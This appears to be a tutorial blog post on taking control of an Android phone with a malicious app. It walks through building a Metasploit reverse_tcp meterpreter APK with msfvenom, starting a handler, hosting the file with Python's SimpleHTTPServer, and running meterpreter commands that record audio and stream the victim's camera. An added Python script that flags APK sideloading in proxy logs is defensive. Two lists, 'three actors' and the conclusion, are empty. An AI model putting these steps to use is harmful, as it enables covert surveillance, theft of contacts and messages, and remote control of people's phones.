
What can happen to your Android phone when you download an Android application from an untrusted source? What would be its impact on your phone? Well, the results are pretty scary. You won't even know what is going on in the background of your Android phone when you install a malicious application.

In this article, we will learn how an attacker can take control of your phone when you install an application from an untrusted source. We will look at the approach the attacker can take and at the results. So, let's begin.

Note: Before we proceed, please keep in mind that this tutorial is for educational purposes only. Its aim is to make everyone aware of the consequences of installing Android applications from untrusted or unknown sources.

I will be performing the process on my own network only. However, the attack can be performed over any network, either LAN or WAN (external network). In this process, three actors are involved:

Note: Attacker and Victim are on the same network here i.e. 192.168.172.x.

Step-1: Creating Malicious Payload

You need to create a malicious Android payload first. To do this, log in to your Kali Linux machine and run the command below. (I assume you already have Kali Linux installed on your PC. If not, you can find plenty of tutorials on installing Kali Linux on the internet, so I will not waste your time here :-D)

#msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip-address> LPORT=<any unused port> -f raw > myandroid.apk


"Msfvenom, here is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit."

• -p: Payload
• LHOST: Local Host
• LPORT: Local Port
• -f: Format

Step-2: Launch Metasploit Framework

Once you have created your own APK, it's time to launch the Metasploit Framework using the msfconsole command on the Kali Linux machine.

"The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection."

Once the Metasploit framework is launched, you need to use multi/handler, which is a stub that handles exploits launched outside of the framework.

Note: Make sure you're using the same payload that you used while creating the malicious APK in Step-1.

Step-3: Host the Malicious Android Application

Now the handler is running. You need to host your malicious Android application somewhere so that the victim can download it onto his/her Android phone.

As this process is only for our own network, you can host it there. For this, you can use a Python module called SimpleHTTPServer.

"Python’s SimpleHTTPServer is the classic quick solution for serving the files in a directory via HTTP (often, you’ll access them locally, via localhost)."

#python -m SimpleHTTPServer 8080


Note: The above command should be run from the same directory where the malicious Android application is kept.

Step-4: Download the Hosted Malicious APK on Android Phone

Now, download the malicious Android application using the following URL in your Android phone's browser. (Please remember that the IP address in the URL is the local IP address of your Kali Linux machine.)

http://192.168.172.32:8080/myandroid.apk


Once the hosted APK is accessed from your android phone, you can see the logs generated in Kali Linux for SimpleHTTPServer.
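
From the defender's side, the same download leaves a recognisable trace in web proxy or gateway logs. The following is an added example, not part of the original article, that scores constructed log records for APK sideloading; the JSON field names and the client addresses are assumptions, while the URL is the one used in this step.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed sample records; field names are hypothetical, not a real product's schema.
SAMPLE_LOG = """\
{"client": "192.168.172.40", "url": "http://192.168.172.32:8080/myandroid.apk", "server": "SimpleHTTP/0.6 Python/2.7.18", "mime": "application/octet-stream"}
{"client": "192.168.172.40", "url": "https://play.google.com/store/apps/details?id=example", "server": "ESF", "mime": "text/html"}
{"client": "192.168.172.41", "url": "http://downloads.example.org/tool.apk", "server": "nginx", "mime": "application/octet-stream"}
{"client": "192.168.172.41", "url": "http://192.168.172.32:8080/index.html", "server": "SimpleHTTP/0.6 Python/2.7.18", "mime": "text/html"}
"""

APK_MIME = "application/vnd.android.package-archive"

def score_record(rec):
    """Return the reasons a proxy record looks like APK sideloading (empty if not an APK)."""
    parts = urlsplit(rec["url"])
    is_apk = parts.path.lower().endswith(".apk") or rec.get("mime") == APK_MIME
    if not is_apk:
        return []
    reasons = ["apk-download"]
    if parts.scheme == "http":
        reasons.append("cleartext-http")
    try:
        ipaddress.ip_address(parts.hostname)  # raises ValueError for DNS names
        reasons.append("bare-ip-host")
    except ValueError:
        pass
    if parts.port not in (None, 80, 443):
        reasons.append("non-standard-port")
    if rec.get("server", "").startswith("SimpleHTTP/"):
        reasons.append("python-simplehttpserver")
    return reasons

def find_sideloads(log_text, min_reasons=3):
    """Return (client, url, reasons) for records with at least min_reasons indicators."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = score_record(rec)
        if len(reasons) >= min_reasons:
            hits.append((rec["client"], rec["url"], reasons))
    return hits

if __name__ == "__main__":
    for client, url, reasons in find_sideloads(SAMPLE_LOG):
        print(client, url, ",".join(reasons))
```

Only the first record crosses the threshold: an APK fetched over cleartext HTTP from a bare IP on port 8080 behind Python's built-in file server is a far stronger signal than an `.apk` served from an ordinary named host.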


Step-5: Install and Access the Android Application

Once the APK is downloaded, install it and click on it.


Step-6: Et Voilà !..You Got the Control

Once you click on the application, look at your Kali Linux machine. You should now have a meterpreter session, which means you have control of the victim's Android phone.


Step-7: Get Ready for the Killing

Now, you can type the "help" command to see what you can do with the victim's phone.


Step-8: Sneak Peek

As you can see, you can run numerous commands on the hacked Android phone. You can dump all the contact numbers, SMS messages and other sensitive data. You can record audio, switch on the camera and even run a live webcam stream from the victim's phone. The victim will be totally unaware of it. Here are some commands you can run to check:

meterpreter>record_mic --> To record the audio

meterpreter>webcam_snap --> To capture the image from the camera

meterpreter>webcam_stream --> To run live camera/video

As you can see, it can be very scary if you download an Android application from an unknown or untrusted source.


Conclusion

So, what we learned from the activity we've done is:

So, this is it for now. I hope this article was insightful. In the 2nd part, we will learn a more sophisticated way to create a malicious Android application. Stay tuned..!!


Reference

  • https://www.offensive-security.com/metasploit-unleashed/